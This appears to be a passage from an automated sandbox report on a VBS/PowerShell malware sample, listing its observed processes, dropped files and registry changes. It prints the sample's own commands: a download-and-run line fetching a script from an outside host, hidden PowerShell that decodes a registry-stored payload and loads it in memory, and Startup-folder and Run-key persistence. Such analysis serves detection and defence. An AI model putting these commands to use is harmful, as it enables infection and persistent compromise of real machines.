Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs'));wscript 'C:\Users\user\AppData\Roaming\microsoft.vbs''
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command 'New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\user\AppData\Roaming\microsoft.vbs' -PropertyType String -Force;'
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command '[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\microsoft.vbs',[System.IO.File]::ReadAllText('C:\Users\user\AppData\Roaming\microsoft.vbs'))'

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell (new-object System.Net.WebClient).DownloadFile('https://briargrove.org/microsoft.vbs','C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'); Start 'C:\Users\SAMTAR~1\AppData\Local\Temp\microsoft.vbs'			Jump to behavior

Windows Shell Script Host drops VBS files

Show sources

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\nUleFczcAh.vbs			Jump to behavior
Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs			Jump to behavior

Boot Survival:

Creates autostart registry keys with suspicious values (likely registry only malware)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft C:\Users\user\AppData\Roaming\microsoft.vbs

Creates multiple autostart registry keys

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nUleFczcAh			Jump to behavior

Drops VBS files to the startup folder

Show sources

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs	Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs	Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Show sources

Source: C:\Windows\System32\wscript.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs

Jump to behavior

Stores files to the Windows start menu directory

Show sources

Source: C:\Windows\System32\wscript.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\nUleFczcAh.vbs			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\microsoft.vbs

Creates an autostart registry key

Show sources

Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nUleFczcAh	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run nUleFczcAh	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nUleFczcAh	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run nUleFczcAh	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run microsoft

Hooking and other Techniques for Hiding and Protection:

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
